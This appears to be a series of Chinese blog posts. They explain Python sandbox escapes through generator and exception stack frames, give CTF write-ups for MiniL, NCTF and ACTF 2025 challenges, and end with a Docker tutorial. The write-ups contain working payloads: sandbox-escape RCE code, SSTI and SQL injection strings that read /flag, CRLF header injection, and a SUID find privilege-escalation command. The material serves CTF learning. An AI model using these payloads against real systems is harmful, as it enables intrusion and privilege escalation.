原理就是通过生成器的栈帧对象通过f_back（返回前一帧）从而逃逸出去获取globals全局符号表。观察下例，可以更好地理解什么是f_back:

def waff():    def f():        yield g.gi_frame.f_back  # 返回调用生成器g的栈帧（即waff函数的栈帧）    g = f()  # 生成器    frame = next(g)  # 获取调用生成器g的栈帧对象    print(frame) # 打印调用生成器g的栈帧（即waff函数的栈帧）    print(frame.f_back)  # 打印调用waff函数的栈帧（通常是模块级栈帧）    print(frame.f_back.f_back) # 打印调用模块的栈帧(这里的模块实际指的就是整个环境，不会再有调用它的栈帧了，因为他就是栈帧堆底)b = waff()'''>None'''

如果把生成器的第一个元素改为g.gi_frame,会发生什么呢?示例如下:
def waff():    def f():      yield g.gi_frame    g = f()     frame = next(g)    print(frame)     print(frame.f_back)waff()'''None'''
神奇的事情发生了：根据我们之前的推断，这里的None不该出现，而应该指向全局环境才对，为什么会出现这个问题呢？
找来找去找了一圈没找到，问ai不懂，到最后得靠万能的群友(mantle神力！)找到了一个提问(本节参考的第二个url)，根据回答，可以总结如下：
CPython 为了避免内存泄漏和引用循环设计了主动行为，源码如下：
/* Don't keep the reference to f_back any longer than necessary.  It* may keep a chain of frames alive or it could create a reference* cycle. */assert(f->f_back == tstate->frame);Py_CLEAR(f->f_back);
在生成器的帧对象挂起（即yield后到下次yield前的冻结状态）时，CPython 会主动清除其f_back引用，防止以下问题：
引用循环：如果生成器的帧（g.gi_frame）通过 f_back 反向引用其调用者帧（如 waff 函数的帧），而调用者帧又直接或间接引用了生成器对象 g，会导致循环引用，无法被垃圾回收。
内存泄漏：长时间保持对调用者帧的引用会阻止整个调用链上的帧被及时释放。
也就是说，生成器在挂起状态时，其f_back属性会被主动置None
那么之前的疑问代码流程就是以下模样：
全局环境调用waff()函数
f()函数被定义
令g为f()函数,即将g定义为生成器
调用next(g),运行生成器至yield返回生成器本身的栈帧(可以直接返回),并在此时挂起
打印frame,即打印生成器本身的栈帧
尝试打印frame.f_back,由于生成器处于挂起状态,其f_back属性主动置None,这里打印None
这样的流程就合理了.同样,之前的符合原本预期的源码流程可以如下解释:
全局环境调用waff()函数
f()函数被定义
令g为f()函数,即将g定义为生成器
调用next(g),运行生成器至yield，希望返回调用生成器g的栈帧对象，此时由于生成器的yield并未返回，也就是说生成器处于运行状态，这个f_back属性将如期返回waff的栈帧(可以在这里打印本栈帧的局部变量，可以确定为waff函数栈帧)
调用waff函数的栈帧对象是全局环境,此处正常打印
没有对象能调用全局环境,故frame.f_back.f_back为None
也是合情合理。
因此，在利用生成器栈帧逃逸时，一定要注意到生成器在挂起状态下是无法如预期地得到上一层调用栈帧的。需要在生成器运行时得到其上一栈帧。

再来一个较为典型的例子感受这个手法：

s3cret="this is flag"codes='''def waff():    def f():        yield g.gi_frame.f_back    g = f()  #生成器    frame = next(g) #获取到生成器的栈帧对象    print(frame)    print(frame.f_back)    print(frame.f_back.f_back)    b = frame.f_back.f_back.f_globals['s3cret'] #返回并获取前一级栈帧的globals    return bb=waff()'''locals={}code = compile(codes, "test", "exec")exec(code,locals)print(locals["b"])'''>>this is flag'''

对于以上代码,我们发现codes这些代码是在test这个沙盒中运行的,理论上是与全局变量隔离的,没办法从test这个局部环境中得到s3cret变量.然而codes中存在符合条件的生成器,这使得可以一层一层地回溯调用栈帧,直到回到全局环境(codes在exec中被调用)

以上就是生成器栈帧逃逸地基本原理，来道题目感受一下

#Pyjail(MiniL 2025)

import socketserverimport sysimport astimport iowith open(__file__, "r", encoding="utf-8") as f:    source_code = f.read()class SandboxVisitor(ast.NodeVisitor):    def visit_Attribute(self, node):        if isinstance(node.attr, str) and node.attr.startswith("__"):            raise ValueError("Access to private attributes is not allowed")        self.generic_visit(node)def safe_exec(code: str, sandbox_globals=None):    original_stdout = sys.stdout    original_stderr = sys.stderr    sys.stdout = io.StringIO()    sys.stderr = io.StringIO()    if sandbox_globals is None:        sandbox_globals = {            "__builtins__": {                "print": print,                "any": any,                "len": len,                "RuntimeError": RuntimeError,                "addaudithook": sys.addaudithook,                "original_stdout": original_stdout,                "original_stderr": original_stderr            }        }    try:        tree = ast.parse(code)        SandboxVisitor().visit(tree)        exec(code, sandbox_globals)        output = sys.stdout.getvalue()        sys.stdout = original_stdout        sys.stderr = original_stderr        return output, sandbox_globals    except Exception as e:        sys.stdout = original_stdout        sys.stderr = original_stderr        return f"Error: {str(e)}", sandbox_globalsCODE = """def my_audit_checker(event, args):    blocked_events = [        "import", "time.sleep", "builtins.input", "builtins.input/result", "open", "os.system",         "eval","subprocess.Popen", "subprocess.call", "subprocess.run", "subprocess.check_output"    ]    if event in blocked_events or event.startswith("subprocess."):        raise RuntimeError(f"Operation not allowed: {event}")addaudithook(my_audit_checker)"""class Handler(socketserver.BaseRequestHandler):    def handle(self):        self.request.sendall(b"Welcome to Interactive Pyjail!\n")        self.request.sendall(b"Rules: No import / No sleep / No input\n\n")        try:            self.request.sendall(b"========= Server Source Code =========\n")            self.request.sendall(source_code.encode() + b"\n")            self.request.sendall(b"========= End of Source Code =========\n\n")        except Exception as e:            self.request.sendall(b"Failed to load source code.\n")            self.request.sendall(str(e).encode() + b"\n")        self.request.sendall(b"Type your code line by line. Type 'exit' to quit.\n\n")        prefix_code = CODE        sandbox_globals = None        while True:            self.request.sendall(b">>> ")            try:                user_input = self.request.recv(4096).decode().strip()                if not user_input:                    continue                if user_input.lower() == "exit":                    self.request.sendall(b"Bye!\n")                    break                if len(user_input) > 100:                    self.request.sendall(b"Input too long (max 100 chars)!\n")                    continue                full_code = prefix_code + user_input + "\n"                prefix_code = ""                result, sandbox_globals = safe_exec(full_code, sandbox_globals)                self.request.sendall(result.encode() + b"\n")            except Exception as e:                self.request.sendall(f"Error occurred: {str(e)}\n".encode())                breakif __name__ == "__main__":    HOST, PORT = "0.0.0.0", 5000    with socketserver.ThreadingTCPServer((HOST, PORT), Handler) as server:        print(f"Server listening on {HOST}:{PORT}")        server.serve_forever()

这里存在沙盒环境sandbox_globals，对于在沙盒中的函数进行限制并且通过ast检查来禁止访问以双下划线（__）开头的私有属性。但是在这里我们仍然可以通过自己造一个生成器来进行栈帧逃逸：

a = (a.gi_frame.f_back.f_back for i in [1])a = [x for x in a][0]# a最终即为safe_exec的栈帧, 此时的a.f_globals就是全局环境了。

接下来，因为import被禁用了，我们得看看全局环境下有啥可以利用的模块：

globals = a.f_globalsglobals['SandboxVisitor'].visit_Attribute=lambda x,y:None # 这里将ast检查干掉，方便后续操作print(globals["sys"].modules["os"]) # 由于源码导入了sys，这里可以确认sys的存在''''''# 这样我们就能确认os存在并且可以拿来用了os = globals["sys"].modules["os"]sys = globals["sys"]# 这里是不能直接用os.popen的。官方文档里有指出os.popen是靠subprocess.popen实现的

a = 'def run(cmd):\n'a += '    r, w = os.pipe()\n'a += '    pid = os.fork()\n'a += '    if pid == 0:\n'a += '        os.close(r)\n'a += '        os.dup2(w, 1)\n'a += '        os.dup2(w, 2)\n'a += '        os.execlp("/bin/sh", "sh", "-c", cmd)\n'a += '    else:\n'a += '        os.close(w)\n'a += '        output = b"".join(iter(lambda: os.read(r, 4096), b"")).decode()\n'a += '        os.close(r)\n'a += '        os.waitpid(pid, 0)\n'a += '        return output\n'# 以上函数改造自官方wp，下有解释

这样就构造出了一个可以执行命令并回显的函数(需要处理输入输出，否则输出在服务端而非客户端)。函数如下：

def run(cmd):    r, w = os.pipe()     pid = os.fork()    if pid == 0:        os.close(r)        os.dup2(w, 1)        os.dup2(w, 2)        os.execlp("/bin/sh", "sh", "-c", cmd)    else:        os.close(w)        output = b"".join(iter(lambda: os.read(r, 4096), b"")).decode()        os.close(r)        os.waitpid(pid, 0)        return output

让我们解释以下这个函数：

r, w = os.pipe():os.pipe()在内核中开辟了一块缓冲区，并返回两个文件描述符，一个用于读取管道（r），一个用于写入管道（w）。这两个文件描述符在父进程和子进程中都可以访问，从而实现了两个进程之间的连接
pid = os.fork():os.fork()创建子进程(该子进程是父进程的副本，在这里就是执行这个函数的进程)并返回pid。这之后，子进程与父进程会得到各自的pid，pid=0为子进程，pid>0为父进程
子进程行为：
- os.close(r):关闭管道读端,因为子进程不需要读入数据
- os.dup2(w, 1),os.dup2(w, 2):将子进程的标准输出(1)和标准错误(2)重定向至管道写端(之后就会通过管道以字节流形式传递给父进程)
- os.execlp("/bin/sh", "sh", "-c", cmd)执行cmd命令,输出将写入管道.
父进程行为:
- os.close(w):关闭管道写端
- output = b"".join(iter(lambda: os.read(r, 4096), b"")).decode():os.read读取管道中的数据(子进程写入的数据,每次读入最多4096字节)，iter函数会不断调用 os.read(r, 4096)，直到返回 b""（这代表着子进程不再写入数据，管道关闭）。
- os.close(r):关闭管道读端,释放资源
- os.waitpid(pid, 0):等待子进程结束
- 最后返回输出，成功将子进程的输出传输到父进程，这样我们就能得到回显了。否则由于运行代码的是服务端，客户端是没办法得到回显的，通过子进程执行命令再由父进程取得输出来避免输出到服务端，而可以被我们拿到。

我们的函数还需要iter函数，运行这个字符串拼接的函数还得要exec，而这些都好拿到：

iter=globals["__builtins__"].iterexec=globals["__builtins__"].exec# 接着运行，就可以用这个函数来rce了exec(a)print(run("ls /"))

至此，已经达到了rce的目的，题目也就基本完结了(原题还有一点小活，不是问题)

#异常栈帧逃逸

本节参考：
Python沙箱逃逸の旁门左道
Python手册——回溯对象

#什么是回溯对象

回溯对象代表一个异常的栈跟踪信息。当异常发生时会隐式地创建一个回溯对象。从py3.7之后，也可以显式地创建一个回溯对象了。

对于隐式地创建的回溯对象，当查找异常处理器使得执行栈展开时，会在每个展开层级的当前回溯之前插入一个回溯对象。当进入一个异常处理器时，程序将可以使用栈跟踪。它可作为sys.exc_info() 所返回的元组的第三项，以及所捕获异常的 __traceback__属性被获取。

#利用手法

直接给出一个例子：

def get_stack_frame_via_exception():    try:        raise Exception    except Exception as e:        tb = e.__traceback__        while tb.tb_next:            tb = tb.tb_next        return tb.tb_frame

对一些关键代码做一些解释：

首先直接抛出异常，触发except,将异常的回溯对象赋值给tb。
通过tb_next来进行栈帧的遍历,直到下一栈帧为None,可以保证最后所在的栈帧是模块级栈帧(这里也可以先用tb_frame得到栈帧，再使用f_back来操作)
最后返回tb_frame来获得栈帧,这样就成功逃逸了

#Pybox(MiniL 2025)

from flask import Flask, request, Responseimport multiprocessingimport sysimport ioimport astapp = Flask(__name__)class SandboxVisitor(ast.NodeVisitor):    forbidden_attrs = {        "__class__",        "__dict__",        "__bases__",        "__mro__",        "__subclasses__",        "__globals__",        "__code__",        "__closure__",        "__func__",        "__self__",        "__module__",        "__import__",        "__builtins__",        "__base__"    }    def visit_Attribute(self, node):        if isinstance(node.attr, str) and node.attr in self.forbidden_attrs:            raise ValueError        self.generic_visit(node)    def visit_GeneratorExp(self, node):        raise ValueErrordef sandbox_executor(code, result_queue):    safe_builtins = {        "print": print,        "filter": filter,        "list": list,        "len": len,        "addaudithook": sys.addaudithook,        "Exception": Exception    }    safe_globals = {"__builtins__": safe_builtins}    sys.stdout = io.StringIO()    sys.stderr = io.StringIO()    try:        exec(code, safe_globals)        output = sys.stdout.getvalue()        error = sys.stderr.getvalue()        result_queue.put(("ok", output or error))    except Exception as e:        result_queue.put(("err", str(e)))def safe_exec(code: str, timeout=1):    code = code.encode().decode('unicode_escape')    tree = ast.parse(code)    SandboxVisitor().visit(tree)    result_queue = multiprocessing.Queue()    p = multiprocessing.Process(target=sandbox_executor, args=(code, result_queue))    p.start()    p.join(timeout=timeout)    if p.is_alive():        p.terminate()        return "Timeout: code took too long to run."    try:        status, output = result_queue.get_nowait()        return output if status == "ok" else f"Error: {output}"    except:        return "Error: no output from sandbox."CODE = """def my_audit_checker(event,args):    allowed_events = ["import", "time.sleep", "builtins.input", "builtins.input/result"]    if not list(filter(lambda x: event == x, allowed_events)):        raise Exception    if len(args) > 0:        raise Exceptionaddaudithook(my_audit_checker)print("{}")"""badchars = "\"'|&`+-*/()[]{}_."@app.route('/')def index():    return open(__file__, 'r', encoding="utf8").read()@app.route('/execute', methods=['POST'])def execute():    text = request.form['text']    for char in badchars:        if char in text:            return Response("Error", status=400)    output = safe_exec(CODE.format(text))    if len(output) > 5:        return Response("TooLong", status=400)    return Response(output, status=200)if __name__ == '__main__':    app.run(host='0.0.0.0')

开始会发现限制有点多，存在badchars直接把许多字符禁用了。但是审计一下safe_exec我们又能发现这个badchars其实只是唬人的，因为在运行我们的代码前会有一个unicode解码，我们只要将我们的代码编码一下上传就能绕过这个badchars了。

然后是绕过沙盒里的审计钩子。这里可以直接重写len方法和list方法,使得他们固定返回指定的bool值就可以不管那两个判定。

接下来就是如何逃逸的问题。这里我们可以发现，SandboxVisitor将生成器禁用了，也就没法利用生成器来逃逸了。这时就用上了异常栈帧逃逸。

还需要注意到我们的代码是会被固定嵌入到print里的，这个好办，投机取巧一下就行，具体怎么做见后述。

整合一下上述思路，可以这么写payload：

")list=lambda x:Truelen=lambda x:Falsetry:    raise Exceptionexcept Exception as e:    globals = e.__traceback__.tb_frame.f_back.f_globals    globals['SandboxVisitor'].visit_Attribute=lambda x,y:None    os = globals["sys"].modules["os"]    os.system("mkdir static $$ ls / > static/a.txt")    print("# 利用 ")...print(" 的形式来绕过print。

由于存在输出长度的限制，我们需要输出内容到另一个文件来查看(这里也可以造一个static来存放)。发现根目录中存在疑似flag文件，但是cat不出来，查看权限发现是不可读的。考虑suid提权：find / -user root -perm -4000 -exec ls -ldb {} \;,可以发现find就有suid权限。那可以直接用了:find . -exec cat /m* \;。如此就解决这题了。

赛题复现

2025-05-12T12:47:53.000Z

#ez_dash_revenge(NCTF 2025)

考点是pydash的原型链污染，还有代码审计，要审计pydash和bottle的一些实现，根据这些来污染。

def setval(name:str, path:str, value:str)-> Optional[bool]:    if name.find("__")>=0: return False    for word in __forbidden_name__:        if name==word:            return False    for word in __forbidden_path__:        if path.find(word)>=0: return False    obj=globals()[name]    try:        pydash.set_(obj,path,value)    except:        return Falsereturn True@bottle.post('/setValue')def set_value():    name = bottle.request.query.get('name')    path=bottle.request.json.get('path')    if not isinstance(path,str):        return "no"    if len(name)>6 or len(path)>32:        return "no"    value=bottle.request.json.get('value')    return "yes" if setval(name, path, value) else "no"@bottle.get('/render')def render_template():    path=bottle.request.query.get('path')    if len(path)>10:        return "hacker"    blacklist=["{","}",".","%","<",">","_"]     for c in path:        if c in blacklist:            return "hacker"    return bottle.template(path)

可以利用pydash的set_函数来进行原型链污染，选定对象(name)，构造链路(path)，然后指定污染为其他对象(value)。然后就要考虑一下怎么污染了。name中把bottle过滤了，并且有变量名长度限制，但是通过__globals__来间接拿到bottle，globals可以用各种长度不超过限制对的对象得到，刚好没有过滤它。所以可以有以下payload:

// name=setval{    "path": "__globals__.bottle.TEMPLATE_PATH",    "value": "['../../../../../proc/self/']"}// 调试可以发现bottle存在TEMPLATE_PATH，默认为./与./views/，这里通过污染它来使得我们直接获取环境变量文件。

但是传入这句时仍会报no，查一下，字符长度也没有问题，那问题可能就出在pydash.set_这个函数的执行上了。一路追踪这个函数的实现，可以发现如下代码：

(source.py)set_ -> (objects.py)set_with() -> (objects.py)update_with() -> (helpers.py)base_set() -> (helpers.py)_raise_if_restricted_key() -> (helpers.py)seattr()到setattr才是真的污染完成。

def _raise_if_restricted_key(key):    # Prevent access to restricted keys for security reasons.    if key in RESTRICTED_KEYS:        raise KeyError(f"access to restricted key {key!r} is not allowed")# RESTRICTED_KEYS = ("__globals__", "__builtins__")def base_set(obj, key, value, allow_override=True):    """    Set an object's `key` to `value`. If `obj` is a ``list`` and the `key` is the next available    index position, append to list; otherwise, pad the list of ``None`` and then append to the list.    Args:        obj: Object to assign value to.        key: Key or index to assign to.        value: Value to assign.        allow_override: Whether to allow overriding a previously set key.    """    if isinstance(obj, dict):        if allow_override or key not in obj:            obj[key] = value    elif isinstance(obj, list):        key = int(key)        if key < len(obj):            if allow_override:                obj[key] = value        else:            if key > len(obj):                # Pad list object with None values up to the index key, so we can append the value                # into the key index.                obj[:] = (obj + [None] * key)[:key]            obj.append(value)    elif (allow_override or not hasattr(obj, key)) and obj is not None:        _raise_if_restricted_key(key)        setattr(obj, key, value)    return obj

也就是说__globals__被pydash本身给拦了，那我们就先把这个拆了：

// name=pydash{    "path": "helpers.RESTRICTED_KEYS",    "value": []}

可以看到成功拆除。这样就可以污染TEMPLATE_PATH了

接下来只要访问/render?path=environ就可以看到当前进程的环境变量了。

#excellent-site(ACTF 2025)

直接先看源码：

import smtplib import imaplibimport emailimport sqlite3from urllib.parse import urlparseimport requestsfrom email.header import decode_headerfrom flask import *app = Flask(__name__)def get_subjects(username, password):    imap_server = "ezmail.org"    imap_port = 143    try:        mail = imaplib.IMAP4(imap_server, imap_port)        mail.login(username, password)        mail.select("inbox")        status, messages = mail.search(None, 'FROM "admin@ezmail.org"')        if status != "OK":            return ""        subject = ""        latest_email = messages[0].split()[-1]        status, msg_data = mail.fetch(latest_email, "(RFC822)")        for response_part in msg_data:            if isinstance(response_part, tuple):                msg = email.message_from_bytes(response_part  [1])                subject, encoding = decode_header(msg["Subject"])  [0]                if isinstance(subject, bytes):                    subject = subject.decode(encoding if encoding else 'utf-8')        mail.logout()        return subject    except:        return "ERROR"def fetch_page_content(url):    try:        parsed_url = urlparse(url)        if parsed_url.scheme != 'http' or parsed_url.hostname != 'ezmail.org':            return "SSRF Attack!"        response = requests.get(url)        if response.status_code == 200:            return response.text        else:            return "ERROR"    except:        return "ERROR"@app.route("/report", methods=["GET", "POST"])def report():    message = ""    if request.method == "POST":        url = request.form["url"]        content = request.form["content"]        smtplib._quote_periods = lambda x: x        mail_content = """From: ignored@ezmail.org\r\nTo: admin@ezmail.org\r\nSubject: {url}\r\n\r\n{content}\r\n.\r\n"""        try:            server = smtplib.SMTP("ezmail.org")            mail_content = smtplib._fix_eols(mail_content)            mail_content = mail_content.format(url=url, content=content)            server.sendmail("ignored@ezmail.org", "admin@ezmail.org", mail_content)            message = "Submitted! Now wait till the end of the world."        except:            message = "Send FAILED"    return render_template("report.html", message=message)@app.route("/bot", methods=["GET"])def bot():    requests.get("http://ezmail.org:3000/admin")    return "The admin is checking your advice(maybe)"@app.route("/admin", methods=["GET"])def admin():    ip = request.remote_addr    if ip != "127.0.0.1":        return "Forbidden IP"    subject = get_subjects("admin", "p@ssword")    if subject.startswith("http://ezmail.org"):        page_content = fetch_page_content(subject)        return render_template_string(f"""                Newest Advice(from myself)
                {page_content}
        """)    return ""@app.route("/news", methods=["GET"])def news():    news_id = request.args.get("id")    if not news_id:        news_id = 1    conn = sqlite3.connect("news.db")    cursor = conn.cursor()    cursor.execute(f"SELECT title FROM news WHERE id = {news_id}")    result = cursor.fetchone()    conn.close()    if not result:        return "Page not found.", 404    return result[0]@app.route("/")def index():    return render_template("index.html")if __name__ == "__main__":    app.run(host="0.0.0.0", port=3000)

我们可以发现/admin是使用render_template_string来渲染的，而其中存在page_content，这个page_content是由fetch_page_content函数得到，这个函数会访问指定url并得到响应(存在一点waf)，url由subject得到，主题是可控的(在/report可以通过url这个参数来指定subject，然后通过get_subject来得到它)。

那么我们大致确定攻击思路，首先我们可以通过/report来给邮件服务器发送请求，然后可以通过/bot的ssrf来使得/admin的ssti触发，那我们还需要一个url以"http://ezmail.org"为起始，再加上这里存在一个/news有一个显然的sql注入点，我们就可以把ssti的语句注入，然后访问/bot来触发ssti：

{{config.__class__.__init__.__globals__['os'].popen('cat /flag').read()}}

url=http://ezmail.org:3000/news?id=-1 UNION ALL SELECT CHAR(123, 123, 99, 111, 110, 102, 105, 103, 46, 95, 95, 99, 108, 97, 115, 115, 95, 95, 46, 95, 95, 105, 110, 105, 116, 95, 95, 46, 95, 95, 103, 108, 111, 98, 97, 108, 115, 95, 95, 91, 39, 111, 115, 39, 93, 46, 112, 111, 112, 101, 110, 40, 39, 99, 97, 116, 32, 47, 102, 108, 97, 103, 39, 41, 46, 114, 101, 97, 100, 40, 41, 125, 125)--From: admin@ezmail.org&content=hi

这里还有个要注意的点是最后的From: admin@ezmail.org,因为源码中get_subjects时只会取得FROM "admin@ezmail.org"的邮件(line 19).以下解释来自ds:

1.漏洞触发点：/report 路由的邮件构造
代码中 /report 路由处理用户提交的 url 和 content，并构造邮件内容：
mail_content = """From: ignored@ezmail.org\r\nTo: admin@ezmail.org\r\nSubject: {url}\r\n\r\n{content}\r\n.\r\n"""mail_content = mail_content.format(url=url, content=content)
本意：将用户提供的 url 插入邮件主题（Subject），content 作为正文。
漏洞：未对用户输入的 url 进行过滤，允许插入换行符（\r\n）或其他控制字符。
2. 攻击者构造恶意输入
攻击者提交的 url 参数包含 CRLF（Carriage Return Line Feed）注入：
POST /report HTTP/1.1...url=http://ezmail.org:3000/news%0D%0AFrom:%20admin@ezmail.org&content=hi
URL 解码后：
url=http://ezmail.org:3000/news\r\nFrom: admin@ezmail.org
关键操作：
%0D%0A 是 URL 编码的 \r\n（即换行符）。
攻击者在 url 参数末尾插入换行符和 From: admin@ezmail.org 字段。
3. 构造恶意邮件内容
服务端将攻击者提供的 url 插入邮件主题后，完整的邮件内容变为：
From: ignored@ezmail.orgTo: admin@ezmail.orgSubject: http://ezmail.org:3000/newsFrom: admin@ezmail.orghi.
解析结果：
邮件头部出现 两个 From 字段：原始的 ignored@ezmail.org 和注入的 admin@ezmail.org。
若SMTP服务器或邮件客户端以最后一个 From 字段为准，则会导致发件人记录为 admin@ezmail.org,从而实现身份的伪造。

#MiniForensicsⅡ(MiniL 2025)

给出的流量包中有个lock.zip，其中存在一个useless.png和breadcrumb.txt。给的附件里已经找无可找了。最后才知道还有png头明文攻击这个玩意，原来明文攻击的门槛这么低说是。

那就构建一个png头，正好这个useless.png的偏移量为0，那么直接造就可以了：

echo 89504E470D0A1A0A0000000D49484452 | xxd -r -ps > png_header

在用bkcreak来攻击：

time bkcrack -C lock.zip -c useless.png -p png_header -o 0

对bkcreak命令的解释：
time：加上time参数查看计算爆破时间
-C：指定加密压缩包
-c：指定压缩包的密文部分
-p：指定明文文件
-o：指定的明文在压缩包内目标文件的偏移量

之后就能解除三段密钥，再用bkcreak就能提取压缩包中的文件了：

bkcrack -C lock.zip -c useless.png -k 45797e52 f747cc4c 800bd117 -d useless.png

发现这个png确实没啥用，把breadcrumb.txt掏出来看看，发现是个b64的网址，指向一个github仓库(https://github.com/root-admin-user/what_do_you_wanna_find.git)，在其中可以找到一个假flag和一个py脚本，这个脚本中能发现有个target_hash，在github这个环境下，很容易想到会是一个commit的编号，那就直接转到这个commit(https://github.com/root-admin-user/what_do_you_wanna_find/commit/89045a3653af483b6bb390e27c10db16873a60d1)，这是个隐藏的commit，直接找是找不到的。这里有个py脚本，运行一下就能得到flag了。

参考：Bugku CTF：请攻击这个压缩包[WriteUP]

docker的基础使用

2025-04-17T06:19:44.000Z

#什么是Linux容器

由于虚拟机存在这些缺点，Linux 发展出了另一种虚拟化技术：**Linux容器(Linux Containers，缩写为LXC)**。

Linux 容器不是模拟一个完整的操作系统，而是对进程进行隔离。或者说，在正常进程的外面套了一个保护层。对于容器里面的进程来说，它接触到的各种资源都是虚拟的，从而实现与底层系统的隔离。

由于容器是进程级别的，相比虚拟机有很多优势：

启动快：容器里面的应用，直接就是底层系统的一个进程，而不是虚拟机内部的进程。所以，启动容器相当于启动本机的一个进程，而不是启动一个操作系统，速度就快很多。
资源占用少：容器只占用需要的资源，不占用那些没有用到的资源；虚拟机由于是完整的操作系统，不可避免要占用所有资源。另外，多个容器可以共享资源，虚拟机都是独享资源。
体积小：容器只要包含用到的组件即可，而虚拟机是整个操作系统的打包，所以容器文件比虚拟机文件要小很多。

总之，容器有点像轻量级的虚拟机，能够提供虚拟化的环境，但是成本开销小得多。

#Docker概述

Docker 属于 Linux 容器的一种封装，提供简单易用的容器使用接口。它是目前最流行的 Linux 容器解决方案。

Docker 将应用程序与该程序的依赖，打包在一个文件里面。运行这个文件，就会生成一个虚拟容器。程序在这个虚拟容器里运行，就好像在真实的物理机上运行一样。有了 Docker，就不用担心环境问题。

总体来说，Docker 的接口相当简单，用户可以方便地创建和使用容器，把自己的应用放入容器。容器还可以进行版本管理、复制、分享、修改，就像管理普通的代码一样。

#Docker的用途

Docker 的主要用途，目前有三大类。

提供一次性的环境：比如，本地测试他人的软件、持续集成的时候提供单元测试和构建的环境。
提供弹性的云服务：因为 Docker 容器可以随开随关，很适合动态扩容和缩容。
组建微服务架构：通过多个容器，一台机器可以跑多个服务，因此在本机就可以模拟出微服务架构。

#image文件(镜像)

Docker把应用程序及其依赖，打包在image文件里面。只有通过这个文件，才能生成Docker容器。image文件可以看作是容器的模板。Docker根据image文件生成容器的实例。同一个image文件，可以生成多个同时运行的容器实例。

image是二进制文件。实际开发中，一个image文件往往通过继承另一个image文件，加上一些个性化设置而生成。举例来说，你可以在Ubuntu的image基础上，往里面加入Apache服务器，形成你的image。

常用操作在速查中记录

image 文件是通用的，一台机器的 image 文件拷贝到另一台机器，照样可以使用。一般来说，为了节省时间，我们应该尽量使用别人制作好的 image 文件，而不是自己制作。即使要定制，也应该基于别人的 image 文件进行加工，而不是从零开始制作。

为了方便共享，image 文件制作完成后，可以上传到网上的仓库。Docker 的官方仓库Docker Hub是最重要、最常用的image仓库。此外，出售自己制作的image文件也是可以的。

#容器文件

image文件生成的容器实例，本身也是一个文件，称为容器文件。也就是说，一旦容器生成，就会同时存在两个文件：image文件和容器文件。而且关闭容器并不会删除容器文件，只是容器停止运行而已。要删除容器，需要使用相应的指令。

常用操作在速查中记录

#Dockerfile文件

学会使用image文件以后，接下来的问题就是，如何可以生成image文件？如果你要推广自己的软件，势必要自己制作image文件。

这就需要用到Dockerfile文件。它是一个文本文件，用来配置image。Docker根据该文件生成二进制的image文件。

#Dockerfile的编写

#.dockerignore文件

.dockerignore文件存放不包含入docker image的路经，例如：

.gitnode_modulesnpm-debug.log

#Dockerfile的基本结构

Dockerfile一般分为四部分：

基础镜像信息
维护者信息
镜像操作指令和容器启动时执行指令
注释(#为注释符)

#Dockerfile文件

Docker以从上到下的顺序运行Dockerfile的指令。为了指定基本映像，**第一条指令必须是FROM**。一个声明以＃字符开头则被视为注释。可以在Docker文件中使用RUN，CMD，FROM，EXPOSE，ENV等指令。

#常见的指令

FROM：指定基础镜像，必须为第一个命令
格式：
```
FROM [--platform=<platform>] <image> [AS <name>]FROM [--platform=<platform>] <image>[:<tag>] [AS <name>]FROM [--platform=<platform>] <image>[@<digest>] [AS <name>]
```
- --platform：指定镜像的平台，例如 linux/amd64、linux/arm64 或 windows/amd64。
- <image>：基础镜像的名称。
- AS <name>：镜像的别名。
- tag：镜像的标签，默认为latest(用于指定版本号)。
- @digest：镜像的摘要。
示例：
```
FROM mysql:5.6
```
MAINTAINER：维护者信息
格式：
```
MAINTAINER ["name"]
```
示例：
```
MAINTAINER Fumo
```
RUN：构建镜像时执行的命令
RUN用于在镜像容器中执行命令，其有以下两种命令执行方式:
- shell执行
  格式:
```
RUN <command>
```
- exec执行
  格式:
```
RUN ["executable","param1","param2"]
```
  示例:
```
RUN apk update
```
  RUN指令创建的中间镜像会被缓存，并会在下次构建中使用。如果不想使用这些缓存镜像，可以在构建时指定--no-cache参数，如：docker build --no-cache
  中间镜像的产生
  在使用命令build命令构建镜像时，比如：
```
docker build -t demo4docker .
```
  构建完成后，查看镜像：
```
docker images -aREPOSITORY      TAG         IMAGE ID       CREATED         SIZEdemo4docker     latest      09dc6a85ec83   6 days ago      776MB             912c358695d4   6 days ago      776MB             affb7d9f6529   6 days ago      709MB             b58ee21ac8b6   6 days ago      643MB
```
  发现出现了几个没有既没有REPOSITORY也没有TAG的镜像，这些就是中间镜像(intermediate images).
  有效<none>镜像和无效<none>镜像
  - 有效none镜像：
    Docker文件系统是由很多layers组成的，每个layer之间有父子关系，所有的 docker文件系统层默认都存储在/var/lib/docker/graph目录下，docker称之为图层数据库。
    所以，这些:镜像是镜像的父层，必须存在的，并且不会造成硬盘空间占用问题。
  - 无效none镜像
    而docker还存在另一种没有被使用到的并且不会关联任何镜像的:镜像，这些镜像被称之为dangling images，这种类型的镜像会造成磁盘空间占用问题。

ADD:将本地文件添加到容器中

tar类型文件会自动解压(网络压缩资源不会被解压).可以访问网络资源,类似wget.

格式：

ADD <src> ... <dest> # 添加src至dest路径ADD ["<src>",...,"<dest>"] # 用于支持包含空格的路径

示例:

ADD hom* /mydir/          # 添加所有以"hom"开头的文件ADD hom?.txt /mydir/      # ?替代一个单字符,例如:"home.txt"ADD test relativeDir/     # 添加"test"到 relativeDir/ADD test /absoluteDir/    # 添加 "test" 到 /absoluteDir/

COPY:功能类似ADD，但是是不会自动解压文件，也不能访问网络资源

CMD:构建容器后调用，也就是在容器启动时才进行调用。

格式:

CMD ["application","param1","param2",...] # 执行可执行文件CMD ["param1","param2",...]  # 设置了ENTRYPOINT，则直接调用ENTRYPOINT添加参数CMD command param1 param2 ... # 执行shell内部命令

示例:

CMD echo "This is a test." | wc -CMD ["/usr/bin/wc","--help"]

ENTRYPOINT：配置容器,使其可执行化
配合CMD可省去application，只使用参数.
格式:
```
ENTRYPOINT ["executable", "param1", "param2"] # 可执行文件ENTRYPOINT command param1 param2 # shell内部命令
```
示例:
```
FROM ubuntuENTRYPOINT ["top", "-b"]CMD ["-c"]
```
ENTRYPOINT与CMD非常类似，不同的是通过
```
docker run
```
执行的命令不会覆盖ENTRYPOINT(在启动容器后,CMD的参数是可以被以上命令覆盖的)，而
```
docker run
```
命令中指定的任何参数，都会被当做附加参数再次传递给ENTRYPOINT，除非加上--entrypoint参数明确指出要覆盖其参数.
Dockerfile中只允许有一个ENTRYPOINT命令，多指定时会覆盖前面的设置，而只执行最后的ENTRYPOINT指令.
LABEL：用于为镜像添加元数据
格式：
```
LABEL <key>=<value> <key>=<value> <key>=<value> ...
```
示例:
```
